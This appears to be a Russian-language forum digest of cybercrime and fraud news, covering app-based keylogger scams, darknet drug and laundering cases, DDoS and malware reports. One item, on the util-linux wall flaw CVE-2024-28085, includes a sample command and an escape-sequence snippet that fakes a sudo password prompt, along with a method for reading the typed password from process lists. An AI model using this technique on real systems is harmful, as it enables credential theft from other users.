Все пострадавшие попались на одну и ту же схему. Они видели в социальных сетях рекламу интересующей их тематики и связывались с продавцами товаров или услуг. Это могли быть продуктовые или клининговые сервисы, службы доставки или ухода за домашними животными. Продавцы неизменно отправляли жертвам ссылки на сайт, с которого якобы нужно было скачать приложение компании для оформления услуги.
В самом приложении было необходимо внести депозит в размере пяти долларов для совершения первого заказа. В этот момент кейлоггер крал данные банковской карты и получал доступ к приложению для банкинга. После совершения несанкционированных транзакций, о которых пользователь не уведомлялся из-за измененных вредоносом настроек оповещения, устройство принудительно сбрасывалось до заводских настроек.
Сейчас полиция продолжает расследование этого дела. Самим сингапурцам рекомендовали не пользоваться непроверенными или незнакомыми онлайн-сервисами и приложениями.
source: straitstimes.com/singapore/10m-lost-in-malware-scam-where-victims- banking-credentials-stolen-by-keylogger-hidden-in-app
31 мая 2023 года о закрытии неожиданно объявил один из крупнейших и старейших торрент-трекеров в мире, RARBG, работавший с 2008 года. После 15 лет работы команда попрощалась с пользователями и объяснила, что COVID-19, рост цен на электроэнергию и специальная военная операция сделали дальнейшую работу проекта невозможной.
[Издание TorrentFreak](https://torrentfreak.com/iconic-torrent-site-rarbg- shuts-down-all-content-releases-stop-230531/) называет закрытие RARBG «концом эпохи», а сам трекер – связующим звеном между пиратской сценой и конечными потребителями контента. Закрытие трекера стало крупнейшим событием такого рода с 2016-2017 годов, то есть со времен, когда со сцены ушли KickassTorrents, Torrentz и ExtraTorrent.
Также журналисты отмечают, что уход RARBG с его огромным, тщательно упорядоченным и постоянно пополнявшимся каталогом фильмов и сериалов, доступных в различном качестве и в различных размерах, может оказать серьезное влияние на другие трекеры. К тому же, еще до активного развития стримингов и легальных сервисов, RARBG одним из первых серьезно занялся каталогизацией субтитров для фильмов и сериалов, за что его ценили слабослышащие и говорящие на разных языках пользователи.
На главной странице всех зеркал сайта вчера появилось сообщение, в котором команда трекера попрощалась с пользователями и объяснила, почему приняла такое решение:
«Привет, народ.
Мы хотели бы сообщить, что приняли решение закрыть сайт.
Последние 2 года были очень тяжелыми для нас — некоторые люди из нашей команды
умерли из-за осложнений, связанных с коронавирусом, другие до сих пор страдают
от его побочных эффектов и вообще не могут работать. Также некоторые воюют в
Европе — ПО ОБЕ СТОРОНЫ [конфликта].
Кроме того, по нам сильно ударило повышение цен на электроэнергию и дата-
центры в Европе. Инфляция сделала наши каждодневные расходы неподъемными.
В связи с этим мы больше не может поддерживать сайт без огромных затрат,
которые больше не в состоянии покрывать из своего кармана.
На голосовании мы единогласно решили, что больше не можем этого делать.
Нам жаль : (
Пока».
[В отдельной публикации](https://torrentfreak.com/rarbg-over-267000-movie-tv- show-magnet-links-appear-online-230601/) журналисты TorrentFreak сообщают, что сообщество пытается спасти архивы и контент RARBG, и на GitHub уже появился репозиторий с magnet- ссылками, охватывающий более 267 000 раздач. Так, файл moviesrarbg.txt содержит ссылки, относящиеся к фильмам, и содержит 117 233 релиза. Еще два файла — showsrarbg.txt и showothers.txt — по-видимому, содержат ссылки, связанные с телешоу и сериалами, которые выкладывали RARBG. Первый файл насчитывает 12 969 magnet-ссылок, а второй содержит 137 669.
Издание напоминает, что проверять валидность и работоспособность этих magnet- ссылок, предположительно связанных с пиратским контентом, было бы незаконно в большинстве стран мира. Однако проверить ссылки без загрузки и раздачи контента все же возможно (например, можно использовать проект TorrentParts), и полученные журналистами метаданные свидетельствуют о том, что ссылки из файлов связаны именно с заявленными материалами.
Уязвимости в медицинских переносных устройствах позволяют отслеживать пациентов
В широко используемом протоколе передачи данных для медицинских IoT-устройств MQTT в 2021 году выявлено 33 уязвимости.
Телемедицина находится на пике своей актуальности, и поставщики медицинских услуг с трудом справляются с нагрузкой, вызванной пандемией коронавирусной инфекции (COVID-19). Но спешка с переходом на телемедицину также привела к появлению множества носимых медицинских устройств для сбора конфиденциальных данных.
Специалисты из «Лаборатории Касперского» в прошлом году обнаружили 33 уязвимости в широко используемом протоколе передачи данных для медицинских IoT-устройств, известном как MQTT. Как предупредили исследователи, все выявленные проблемы подвергают риску данные пациентов. С 2014 года было зафиксировано 90 уязвимостей в MQTT, многие из которых до сих пор не исправлены.
Удобство MQTT делает его распространенным решением в большинстве IoT-гаджетов, включая медицинские устройства. Но в таких устройствах не требуется аутентификация, а шифрование встречается редко, подвергая пользователей риску MitM-атак и кражи данных.
«Лаборатория Касперского» также сообщила об обнаружении уязвимостей в наиболее распространенной платформе носимых устройств — Qualcomm Snapdragon Wearable. Общее количество уязвимостей, обнаруженных в платформе с момента ее запуска в 2020 году, достигло 400.
В 2019 году количество критических уязвимостей, найденных в протоколе MQTT, составило 15, в 2020 году их было 8, а в 2021 году — 18.
Согласно отчету компании Constella, в 2020 году количество утечек персональных данных в медицинском секторе выросло в 1,5 раза по сравнению с 2019 годом. Журнал HIPAA, посвященный утечкам в США, о которых сообщают медицинские организации, также отмечает рост как количества утечек, так и среднего числа жертв в результате них. В 2021 году HIPAA зафиксировала 642 утечки данных медицинских организаций против 512 в 2019 году.
«Разработчики приложений должны понимать, что уязвимости в приложении и отсутствие безопасности в целом могут позволить киберпреступникам получить доступ к личным разговорам врачей и пациентов, пользовательским базам данных, платежным реквизитам и другой особо конфиденциальной информации», — пояснили специалисты «Лаборатории Касперского».
Получила логическое завершение нашумевшая история масштабного интернет- мошенничества. Группа злоумышленников создала десяток интернет-магазинов и единый колл-центр, операторы которого принимали заказы от клиентов по всей Украине, создавая впечатление солидности и надежности предприятия.
При этом, платежи от клиентов принимались только в виде полной предоплаты за товар, на реквизиты нескольких официально оформленных ТОВ («Технопарк-Центр», «ЛТД-Продукт»). Однако, после того, как клиенты оплачивали немалые суммы за несуществующий товар, «операторы» магазинов просто добавляли их в черный список.
Официально, по данному уголовному делу проходило более 70 потерпевших, потребовавших возместить нанесенный им материальный и моральный ущерб, в размере от 1,5 до 15 тысяч гривен. Общий размер нанесенного мошенниками ущерба оценивается, как особо крупный.
Обвиняемый мошенник долго не признавал свою вину и утверждал, что стал жертвой «подставы» со стороны других участников схемы. Мол, он всего лишь выполнял отведенные ему функции курьера и администратора сайтов, а также обналичивал деньги, и не подозревал, что участвует в мошенничестве.
Между тем, его вина была полностью доказана правоохранителями, которые провели детальный анализ переписки подозреваемого с другими участниками, содержавшейся на изъятых компьютерах и мобильных телефонах.
В результате, мошенник предстал перед судом, где получил за свои действия, связанные с нарушением ч.4 ст. 190 (мошенничество, совершенное группой лиц в особо крупных размерах), наказание, в виде лишения свободы, сроком на 6 лет, с конфискацией имущества. Решением суда, конфискованные у мошенника денежные средства, решено пустить на возмещение ущерба потерпевшим.
Несмотря на то, что полная предоплата является излюбленным инструментом мошенников, большинство потерпевших повелись на «официальность» предоставленных им реквизитов. К сожалению, официальная регистрация фирм- однодневок не является достаточной гарантией защиты граждан от мошенничества. Актуальный юридический статус, а также наличие проблем с налогами и правоохранительными органами у вызывающих подозрение интернет-магазинов, стоит проверять на сайте YouControl.com.ua.
Полицейская служба Европейского союза сообщила об успешном завершении международной операции компетентных органов Болгарии, Кипра, Нидерландов, Украины и ФРГ при поддержке Европола и Евроюста против организованной преступной группы, вовлеченной в финансовое мошенничество.
В ходе полицейских операций, осуществленных одновременно в Болгарии, на Кипре и Украине, был проведен ряд обысков и допросов, изъяты средства телефонной связи, электронное оборудование, получены сохраненные данные и установлены номера банковских счетов. При этом на Кипре был задержан один из ключевых фигурантов дела, отмечается в сообщении, размещенном на официальном сайте Европола.
По сведениям правоохранительных органов, преступная сеть вела свою деятельность в период с мая 2019 года по сентябрь 2021 года, соответствующий ущерб составил около 15 миллионов евро.
Подозреваемые осуществляли мошеннические операции через компанию, находящуюся на Украине, и два колл-центра в столице Болгарии Софии. Используя заранее разработанные сценарии переговоров и представляясь специалистами в области финансов, сотрудники колл-центров, большая часть из которых, как считает следствие, не знала о том, что работает на мошенников, связывались с потенциальными инвесторами из ФРГ.
Лицам, согласившимся на получение услуг поддельной инвестиционной онлайн- платформы и разместившим на ней свои средства, первоначально демонстрировались высокие финансовые результаты. Основываясь на этих данных, потерпевшие увеличивали вложения, однако не имели возможности ни получить якобы причитающуюся им прибыль, ни вернуть инвестированные суммы.
Всего к настоящему времени в рамках расследования в ФРГ открыто около 250 уголовных дел.
• Source: europol.europa.eu/newsroom/news/network-selling-fake-financial- services-online-taken-down
Атака затронула финансируемого государством интернет-провайдера Belnet, чьими услугами пользуются правительственные организации, в том числе парламент.
Большая часть IT-сети бельгийского правительства была отключена в результате мощной DDoS-атаки, из-за чего его внутренние системы и публичные сайты оказались недоступными.
Атака затронула финансируемого государством интернет-провайдера Belnet, чьими услугами пользуются правительственные организации, в том числе парламент, образовательные учреждения, министерства и исследовательские центры. Инцидент сказался на работе более 200 организаций, в частности официального портала для подачи налоговых деклараций My Minfin и IT-системы, используемые школами и университетами для удаленного обучения. Министерство юстиции Бельгии также сообщило о сбоях в работе своих систем, но не представило никаких подробностей.
Портал резервирования вакцины против COVID-19, хостинг которому предоставляет Belnet, был недоступен. Парламентские и другие правительственные мероприятия были сорваны, например, некоторые встречи не могли состояться, поскольку их нельзя было транслировать для удаленных участников.
Как сообщили в Палате представителей Бельгии, только Комитет по финансам и международным отношениям смог провести одно заседание, да и то остальные пришлось отменить из-за DDoS-атаки.
Несколько бельгийских политиков и политических наблюдателей отметили, что атака началось примерно в то же время, когда Комитет по иностранным делам парламента Бельгии должен был провести заседание и заслушать свидетельские показания по одному из дел.
млн украинских гривен.
Сотрудники ФСБ раскрыли сеть из 29 офисов по незаконному обналичиванию гривны в Донецкой Народной Республике (ДНР) и Запорожской области. Подозреваемые делали это с использованием криптовалюты через зарубежные электронные финансовые площадки, сообщили в пресс-службе регионального управления ФСБ.
"УФСБ России по Запорожской области пресечена деятельность межрегиональной преступной группы из числа сотрудников коммерческой организации, причастной к осуществлению незаконной банковской деятельности на территории Запорожской области и ДНР. Прекращено функционирование 29 офисов, специализирующихся на незаконных банковских операциях по обналичиванию гривны под видом эквайринга через валютные терминалы и мобильные приложения украинских банков, а также на сделках с криптовалютой через зарубежные электронные финансовые площадки"
Click to expand...
По предварительным данным ФСБ, сумма обналиченных и выведенных за рубеж денежных средств в 2023 году составила около 500 млн украинских гривен (1,2 млрд рублей). ГСУ МВД России по Запорожской области в отношении троих подозреваемых возбуждено уголовное дело по п. "а" ч. 2 ст. 172 УК РФ (незаконная банковская деятельность, совершенная организованной группой лиц). Следственные действия продолжаются.
Сотрудники Управления экономической безопасности и противодействия коррупции МВД по Кабардино-Балкарской Республике в результате проведённых оперативно- розыскных мероприятий установили причастность 29-летнего жителя Нальчика к мошенничеству в особо крупном размере и легализации денежных средств, полученных преступным путём.
Предварительно установлено, что злоумышленник, получив доступ к аккаунту одного из учреждений культуры республики, изменил платёжные реквизиты данной организации на свои. В результате на его счёт с предоплаченных банковских карт с номиналом 5 тысяч рублей стали поступать денежные средства, которые выделяются на посещение различных культурных мероприятий. Всего за период с июня 2021 года по март 2022 года им было похищено более 2,95 млн рублей.
Кроме того, с целью отмывания криминального дохода мужчина приобрёл криптовалюту на сумму свыше 2,2 млн рублей, а также погасил свои долги по кредитным договорам с 12 финансовыми организациями, перечислив на счета банков более 279 тысяч рублей. По версии полиции, им легализовано почти 2,5 млн рублей.
Следственной частью Следственного управления МВД по Кабардино-Балкарской Республике в отношении гражданина возбуждены уголовные дела по признакам преступлений, предусмотренных ч. 4 ст. 159 и ч. 2 ст. 174.1 Уголовного кодекса Российской Федерации.
Гражданин Индии Банмит Сингх признал себя виновным в распространении наркотиков через маркетплейсы в даркнете и отмывании незаконных доходов
Гражданин Индии Банмит Сингх на суде в США признал себя виновным в распространении наркотиков через маркетплейс в даркнете и согласился на конфискацию $150 млн в криптовалюте, говорится в пресс-релизе Минюста США.
Согласно судебным документам, 40-летний Сингх продавал на таких площадках, как Silk Road и Alpha Bay, запрещенные вещества. Клиенты оплачивали покупки криптовалютой. Затем Сингх лично отправлял или организовывал отправку наркотиков из Европы в Соединенные Штаты и другие страны по почте.
С 2012 по 2017 год наркоторговец контролировал как минимум восемь ячеек по распространению наркотиков на территории США. Сотрудники этих ячеек получали партии товара из-за рубежа, затем переупаковывали его и отправляли заказчикам в другие штаты, в Канаду, Англию, Ирландию, Шотландию, на Ямайку и Виргинские острова.
За эти годы организация Сингха разослала сотни килограммов веществ и получила около $150 млн в криптовалюте. В апреле 2019 года Сингх был арестован в Лондоне, а Соединенные Штаты добились его экстрадиции в 2023 году.
Сингх признал себя виновным, в том числе и в отмывании денег. Ему грозит наказание в виде восьми лет лишения свободы, говорится в сообщении.
«Члены организации Сингха часто использовали имя Листон и подписывались фирменной фразой «Я все еще танцую». Сегодня, когда Банмит Сингх признал себя виновным, танцы закончились», — сказал прокурор Южного округа штата Огайо Кеннет Л. Паркер.
Правительство США владеет биткоинами почти на $3 млрд, и значительная их часть так или иначе связана с конфискацией монет по делу первого нелегального онлайн-маркетплейса Silk Road. В начале января власти Соединенных Штатов заявили, что планируют продать почти 3 тыс. биткоинов.
sc: moneylaundering.com/wp- content/uploads/2024/01/DOJ.Pressrelease.DakWebPlea.12624.pdf
Следственным Управлением УМВД России по городу Южно-Сахалинску завершено расследование уголовного дела по обвинению 24-летнего местного жителя в неправомерном доступе к охраняемой законом компьютерной информации, повлекший уничтожение и блокирование компьютерной информации.
Установлено, что фигурант в марте, будучи дома, со своего компьютера, авторизовавшись в кабинете компании в области разработки программного обеспечения, увидел, что он уволен, его учетная запись аннулирована. Тогда у него возник преступный умысел на неправомерный доступ к служебной компьютерной информации компании с целью ее уничтожения и блокировки.
Используя ранее созданную им учетную запись, которую без согласия индивидуального предпринимателя наделил правами «администратора», авторизовался на портале и в почтовом сервисе, а затем удалил почтовый сервер корпоративной почты. Впоследствии это повлекло уничтожение конфиденциальной служебной компьютерной информации компании: электронных договоров с клиентами и заявок от них на оказание услуг, финансовых документов об оплате клиентами оказанных услуг.
Кроме того, обвиняемый, с помощью своих специальных познаний в сфере компьютерной информации и навыков работы с компьютерами, используя вышеуказанную учетную запись, обладающую правами «администратор», авторизовался в кабинете компании и удалил учетные записи. Это повлекло блокирование конфиденциальной служебной компьютерной информации: электронной печати компании, электронной цифровой подписи компании, электронных лицензионных ключей, доступы к личным кабинетам клиентов.
Таким образом, гражданин своими умышленными действиями, в результате которых компания лишилась возможности осуществлять свою коммерческую деятельность, совершил преступление, предусмотренное ч. 1 ст. 272 УК РФ.
За последние полгода Aqua Security зафиксировала 700 тыс. атак на своих ханипотах. Их разбор показал, что более чем в половине случаев злоумышленники уделяли много внимания уходу от обнаружения и закреплению на скомпрометированном узле.
Техники обхода защиты при этом разнообразны. Чаще всего используются маскировка (к примеру, исполнение файлов из папки /tmp) и обфускация файлов / информации (например, динамическая загрузка кода).
В 5% инцидентов было замечено применение исполняемых в памяти вредоносов. Согласно статистике Aqua, число бесфайловых атак возросло на 1400% в сравнении с прошлым годом.
«Злоумышленники прилагают все больше усилий для обхода безагентных решений и чаще добиваются успеха, — [комментирует](https://www.aquasec.com/news/aqua- nautilus-research-finds-1400-surge-in-memory-based-attacks/) Ассаф Мораг (Assaf Morag), специалист по киберразведке из подразделения Aqua Nautilus. — Наиболее показательный пример тому — [HeadCrab](https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with- novel-state-of-art-redis-malware), очень сложный и скрытный зловред, поразивший более 1200 серверов Redis».
Облачные вычисления, по словам экспертов, сильно расширили площадь атаки, создав новые риски. [В новом отчете](https://info.aquasec.com/2023-cloud- native-threat- report?_gl=1oy6scb_gaNzc0NTM4OTQ5LjE2ODg1NDM0MjA._ga_D2G99SQ9HG*MTY4ODU0MzQyMC4xLjEuMTY4ODU0Mzk1Mi41LjAuMA..&_ga=2.244169798.2110979981.1688543422-774538949.1688543420) об угрозах для облачных сред также подробно рассмотрены атаки на цепочку поставок, риски, связанные с уязвимостями и ошибками конфигурации, и защита рабочих сред приложений, оптимизированных для выполнения в облаке.
Число supply-chain-атак, по данным Aqua, за полугодие возросло более чем на 300%. Базирующиеся в облаке системы тесно взаимосвязаны и многослойны, и все компоненты постоянно взаимодействуют друг с другом. Защитить такой софт непросто, зато он предоставляет отличный шанс для атаки на цепочку поставок, открывающей доступ к конфиденциальным данным и другим веб-сервисам.
Ошибки конфигурации, даже небольшие, могут обернуться большой неприятностью для облачной инфраструктуры. За полгода команда Aqua Nautilus выявила свыше 25 тыс. серверов, уязвимых к атакам из-за неправильно настроенного демона Docker.
Для защиты облачных сред исполнения эксперты рекомендуют использовать мониторинг. — как минимум сканы на предмет известных вредоносных файлов и сетевых коммуникаций, с возможностью блокировки и выдачи алертов. Еще лучше, когда защитное решение умеет также отслеживать признаки вредоносного поведения, такие как попытки несанкционированного доступа к закрытой информации, попытки скрыть процесс и повысить привилегии, открытие бэкдора для незнакомого IP-адреса.
Не исключено, что в обозримом будущем защиту приложений и данных в облаках начнут обеспечивать специализированные платформы конфиденциальных вычислений. Темпы внедрения этой технологии пока оставляют желать лучшего, однако работы в этом направлении ведутся, и небезуспешно.
Червь Windows недавно был обнаружен в сетях сотен организаций в различных отраслях промышленности, сообщила компания Microsoft.
Вредоносная программа, известная как Raspberry Robin, распространяется через зараженные USB-устройства, и впервые была обнаружена аналитиками Red Canary в сентябре 2021 года.
Фирма Sekoia, специализирующаяся на кибербезопасности, также заметила его использование устройств QNAP NAS в качестве командно-контрольных серверов (C2) в начале ноября, а компания Microsoft заявила, что обнаружила вредоносные артефакты, связанные с этим червем, созданным в 2019 году. ...
Хотя Microsoft заметила, что вредоносная программа подключается к адресам в сети Tor, хакеры еще не использовали их. ...
Компания Microsoft поделилась этой информацией в частном бюллетене по анализу угроз, распространенном среди пользователей Microsoft Endpoint Defense и попавшем в поле зрения bleepingcomputer[.]
"Raspberry Robin использует msiexec.exe для попыток внешних сетевых соединений, чтобы достичь вредоносных доменов в целях C2".
Исследователи безопасности, обнаружившие Raspberry Robin, пока не приписывают вредоносную программу конкретной хакерской группе и все еще работают над поиском конечной цели ее операторов.
Однако, учитывая, что злоумышленники могли в любой момент загрузить и развернуть в сети жертвы дополнительное вредоносное ПО и повысить свои привилегии, Microsoft отметила эту деятельность как высокорискованную.
https://www.bleepingcomputer[.]com/...y-robin-worm-in-hundreds-of-windows- networks/
Суд в Ростове-на-Дону оштрафовал хакера Серафима Кирюшина, который распространял вредоносные программы, в том числе в отношении ресурсов органов власти. Об этом в четверг сообщили журналистам в пресс-службе управления ФСБ России по Ростовской области.
"Решением Ленинского районного суда Кирюшину назначена мера уголовного- правового характера в виде судебного штрафа в размере 100 тыс. рублей", - говорится в сообщении.
Деятельность хакера пресекли сотрудники ФСБ России. Суд установил, что мужчина распространял и использовал вредоносное программное обеспечение, в том числе в отношении электронных ресурсов органов государственной власти и управления.
source: tass.ru/proisshestviya/14167699
Отделению полиции выставлен счет за электричество на 231 тысячу рублей.
Следственный комитет возбудил уголовное дело о превышении полномочий в отношении полицейского, который занимался майнингом криптовалюты в помещении МВД. Об этом сообщает пресс-служба следственного управления СК РФ по Саратовской области.
"По данным следствия, в период с декабря 2020 по июль 2021 года сотрудник РЭО (регистрационно-экзаменационного отделения) ГИБДД УМВД России по Саратову, имея доступ к временно не используемому помещению... на улице 6-й Соколовогорский проезд Саратова, принадлежащему органу полиции, установил в нем и подключил к электросети два электронных устройства, посредством которых осуществлялось получение криптовалюты в сети интернет. Ущерб, причиненный его противоправными действиями, состоящий в переплате за электроэнергию, составил 231 тысячу рублей", - говорится в сообщении.
В ходе обыска в одном из помещений были найдены два майнера, wi-fi роутер и три блока питания. Отмечается, что инспектор не успел заработать криптовалюту.
Выявили преступные действия полицейского сотрудники управления собственной безопасности главка МВД. Следователи возбудили в отношении него уголовное дело по статье "Превышение должностных полномочий", ему грозит до четырех лет лишения свободы.
В настоящее время по уголовному делу проводятся следственные действия,
направленные на установление всех обстоятельств произошедшего и закрепление
доказательств. Расследование уголовного дела продолжается.
Подробнее:
https://www.securitylab.ru/news/525249.php
Вирусную программу для удаленного доступа, которая может читывать пароли и персональные данные, обнаружили на одном из оборонно-промышленных предприятий Керчи. Утечку конфиденциальной информации предотвратили сотрудники управления ФСБ по Крыму и Севастополю.
- Задокументирован факт наличия на объекте критической информационной инфраструктуры оборонного предприятия вирусного программного обеспечения, способного осуществлять несанкционированный захват персональных паролей и других данных, что способствует несанкционированному удаленному доступу в ходе хакерских атак, - сообщили в ведомстве.
Системному администратору, который должен следить за информационной безопасностью предприятия оборонного ведомства, вынесли предостережение.
Подобные действия, как отметили в УФСБ, создают условия для преступления, которое может быть квалифицировано по ч.1 ст. 273 УК РФ (Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации).
Начиная с февраля этого года сайты госорганов Крыма, а также СМИ республики периодически подвергаются хакерским атакам. Работы по выявлению хакеров ведут правоохранители.
источник kp.ru/daily/27441/4643779/
Партия «Новые люди» повторно внесла в Госдуму доработанный законопроект о противодействии сталкингу. Документ включает предложения по закреплению в законодательстве понятий «навязчивое преследование», «запрет на приближение», «преследовать» и «жертва преследования». Соответствующие материалы имеются в распоряжении РБК.
Согласно законопроекту, предлагается дополнить Кодекс об административных правонарушениях новой статьей, предусматривающей ответственность за преследование. Документ пройдет обсуждение в правительственной комиссии.
В пояснительной записке уточняются определения преследования, а также закрепляются основы правового регулирования для борьбы с этим явлением и защиты пострадавших. В документе подчеркивается, что действующие нормы КоАП и Уголовного кодекса не охватывают все виды подобных правонарушений и не учитывают тяжесть психологического вреда, который сталкинг наносит жертвам.
Под «навязчивым преследованием» подразумеваются действия, вызывающие у жертвы психоэмоциональное напряжение и опасения за свою безопасность или безопасность близких. Эти действия продолжаются, несмотря на предупреждение о необходимости их прекращения.
В тексте документа указано, что к таким действиям относятся неоднократное умышленное слежение или ожидание жертвы в местах её повседневной жизни, а также неоднократные умышленные попытки установить контакт, включая телефонные звонки, сообщения по СМС, взаимодействие через интернет, почтовую переписку, отправку подарков и другие аналогичные действия.
Депутаты отметили, что механизм запрета на приближение к жертве уже предусмотрен Уголовно-процессуальным кодексом, но он применяется лишь к отдельным видам правонарушений.
Первый вариант законопроекта был внесен в Госдуму в октябре 2023 года. Тогда представители партии указали, что в законодательстве отсутствует прямой запрет на приближение к жертве преследования. Правительство вернуло документ на доработку, обратив внимание на необходимость предварительного внесения изменений в КоАП. В отзыве подчеркивалось, что требуется формирование правоприменительной практики, которая могла бы подтвердить увеличение числа таких правонарушений. Также указывалось, что предложенные определения преследования не отвечают требованиям ясности и недвусмысленности.
В Орловской области сотрудники регионального УМВД пресекли противоправную деятельность группы лиц, которые совершили серию киберпреступлений. Три молодых орловца взламывали сайт Госуслуг жителей других регионов России и оформляли на них микрозаймы.
Как сообщает пресс-служба УМВД России по Орловской области, незаконную деятельность выявили и пресекли сотрудники отдела по борьбе с противоправным использованием информационно-коммуникационных технологий регионального УМВД в ходе проверки оперативной информации.
Так, злоумышленниками оказались трое парней – один 2005 и двое 2006 годов рождения, действовавшие с июля 2023 года по май 2024-го. Они осуществляли неправомерный доступ к личным кабинетам сервиса «Госуслуги» жителей разных регионов России, а затем оформляли на них займы в различных микрокредитных и микрофинансовых организациях. Суммы составляли от 3 до 20 тысяч рублей.
Сейчас в Орле расследуются уголовные дела, возбуждённые по признакам преступлений, предусмотренных ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации» и ч. 1 ст. 159 УК РФ «Мошенничество» по 35 эпизодам преступной деятельности. Кроме того, проверяется причастность подозреваемых к другим подобным случаям.
В настоящий момент фигурантам избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
Инновационный проект превратит хищников в добычу.
Тинькофф Банк запустил инновационный пилотный проект под названием «Фрод- рулетка», направленный на борьбу с телефонными мошенниками. Согласно официальному заявлению финансового учреждения, данная инициатива представляет собой систему, где подключенные случайным образом пользователи будут изображать жертв преступников, тем самым создавая дополнительные препятствия для мошеннической деятельности.
Суть проекта «Фрод-рулетка» заключается в том, что вместо настоящих пострадавших в диалог с мошенниками будут вступать заранее осведомленные участники программы. Как поясняют представители Тинькофф Банка, идея данного сервиса – «охотиться на мошенников, сделав хищника добычей». Участники программы смогут общаться с преступниками по телефону, при этом злоумышленники не будут знать, что попали в ловушку и примут добровольцев за реальных потенциальных жертв.
На начальном этапе в проект приглашаются люди с опытом в проведении пранков, а также те, кто не опасается возможного конфликта с злоумышленниками. Пока неизвестны детали того, каким образом система будет идентифицировать звонки от мошенников и отличать их от обычных вызовов. Также финансовое учреждение пока не предоставило подробной информации о сроках и механизмах полномасштабного внедрения «Фрод-рулетки». Решение о запуске и масштабировании сервиса будет приниматься по факту испытаний, так как предстоит много технической работы, пояснили в Тинькофф.
sc: ria.ru/20240424/servis-1941860700.html
В утилите wall, поставляемой в пакете util-linux и предназначенной для отправки сообщений в терминалы, [выявлена](https://www.openwall.com/lists/oss- security/2024/03/27/5) уязвимость ([CVE-2024-28085](https://security- tracker.debian.org/tracker/CVE-2024-28085)), позволяющая осуществить атаку на терминалы других пользователей через манипуляцию с escape- последовательностями. Проблема вызвана тем, что утилита wall блокирует использование escape-последовательности во входном потоке, но не выполняет эту операцию для аргументов в командной строке, что позволяет атакующему выполнить escape-последовательности в терминале других пользователей.
Например, выполнив 'wall $(printf "\033[33mHI")' можно вывести надпись "HI" жёлтым цветом. При помощи escape-последовательностей, которые позволяют перемещать указатель, очищать и заменять содержимое на экране, можно симулировать показ приглашения о вводе пароля от утилиты sudo в терминале другого пользователя. Если пользователь не заметит подвоха и введёт свой пароль, то пароль засветится в истории ввода как несуществующая команда (по сути пользователь вместо команды введёт свой пароль в командной строке).
Code:Copy to clipboard
"\033[3A" // перемещаем курсор вверх на 3 строк
"\033[K" // удаляем предыдущий вывод
"[sudo] password for a_user:" // выводим фиктивный запрос sudo
"\033[?25l" // выставляем фоновый цвет для скрытия ввода
"\033[38;2;48;10;36m"
Во время вывода предупреждения о том, что введённая команда не найдена, во многих дистрибутивах запускается обработчик /usr/lib/command-not-found, который пытается определить пакет, в котором присутствует отсутствующая команда, и выдать подсказку о возможности его установки. Проблема в том, что при запуске обработчика command-not-found несуществующая команда передаётся в него в качестве параметра командной строки, который виден при просмотре процессов в системе (например, при попытке запуска неустановленной утилиты "xsnow" в списке процессов будет виден "/usr/lib/command-not-found -- xsnow"). Соответственно, атакующий может организовать мониторинг запускаемых процессов (например, анализируя появление "/proc/$pid/cmdline" для прогнозируемого номера PID) и определить пароль, введённый жертвой в командной строке.
Для того чтобы пользователь ввёл пароль в ответ на фиктивное приглашение sudo предложен трюк, суть которого в отслеживании в списке процессов реального запуска утилиты sudo, ожидания её завершения и осуществления атаки через "wall" сразу после этого. Через манипуляции c escape-последовательностями атакующий может заменить сообщение после реального выполнения sudo на фиктивное приглашение повторного ввода пароля. Жертва может подумать, что ошиблась при вводе и ввести пароль второй раз, засветив пароль в аргументах обработчика "command-not-found".
Для успешной атаки требуется установка режима "mesg" в значение "y", которое по умолчанию выставлено в Ubuntu, Debian и CentOS/RHEL. Возможность проведения атаки продемонстрирована в Ubuntu 22.04 в конфигурации по умолчанию при использовании gnome-terminal. В Debian атака затруднена, так как в дистрибутиве по умолчанию не включён обработчик "command-not-found", а в CentOS/RHEL атака не сработает, так как утилита wall установлена без флага setgid и не имеет доступа к чужим терминалам. При использовании windows- terminal атака может быть модифицирована для изменения содержимого буфера обмена.
[Уязвимость проявляется в пакете util-linux с 2013 года](https://github.com/util-linux/util- linux/commit/cdd3cc7fa4cafde492039180bb47f27ab8422261), после того как в выпуск 2.24 добавили возможность указания сообщения в командной строке wall, но забыли применить чистку escape-последовательностей. Исправление уязвимости включено во вчерашний выпуск util-linux 2.40. Примечательно, что при попытке исправления уязвимости в выпуске util-linux 2.39 была выявлена ещё одна похожая уязвимость, позволяющая совершить подстановку управляющих символов через манипуляцию с локалями.
Ему позвонили от имени директора Российской ассоциации героев.

По данным источников, 65-летнему генерал-лейтенанту Николаю Гаврилову позвонили 10 февраля. Мошенник представился директором ассоциации героев РФ и сообщил Гаврилову, что его сбережения под угрозой. Далее генерал-лейтенанта переключили на сотрудников ФСБ, где он ранее служил, и на работников Центробанка.
Мошенники убедили Гаврилова снять полтора миллиона рублей со счёта в Сбербанке и положить их на безопасный счёт через банкомат «Альфы». Всю схему они провернули за четыре дня. 14 февраля Гаврилов понял, что его обманули, и обратился в полицию.
sc: t.me/bazabazon/25289
Американец пытался отмыть десятки миллионов долларов, заработанных на торговле ксанаксом, сидя в тюрьме
Жителю американского Рейстерстауна (штат Мэриленд) и его отцу вынесен приговор за отмывание доходов от нелегальной продажи лекарственных препаратов в даркнете. По данным следствия, речь может идти о десятках миллионов долларов.
38-летний Райан Фараче (Ryan Farace) был приговорен к 4,5 года, а его 72-летний отец Джозеф Фараче (Joseph Farace) — к 19 месяцам. Сын на протяжении долгого времени содержал на одном из маркетплейсов магазин XANAXMAN, который торговал алпразоламом (продается под торговым названием «Ксанакс»). Расследование показало, что суммарно это принесло ему 9138 BTC (около 420 миллионов долларов на январь 2024 года, около 73 миллионов долларов на момент ареста Фараче в 2018 году). Часть криптовалютных активов обвиняемого была конфискована, а сам он был приговорен к шести годами заключения.
Оперативники выяснили, что Фараче-младшему удалось скрыть от следствия некоторые свои доходы. В августе 2020 года он на встрече передал своему отцу книгу из тюремной библиотеки, написав на задней обложке данные своего криптовалютного кошелька, на котором хранились 2874 BTC (тогда — около 30 миллионов долларов). Фараче-старший должен был перевести крипту третьей стороне, с помощью коей планировалось открытие счетов в иностранных банках. Отец выполнил просьбу сына, но в итоге афера не удалась и закончилась приговором для обоих.
sc: justice[.]gov/usao-md/pr/father-and-son-sentenced-laundering-drug- trafficking-bitcoin-proceeds-intended-federal
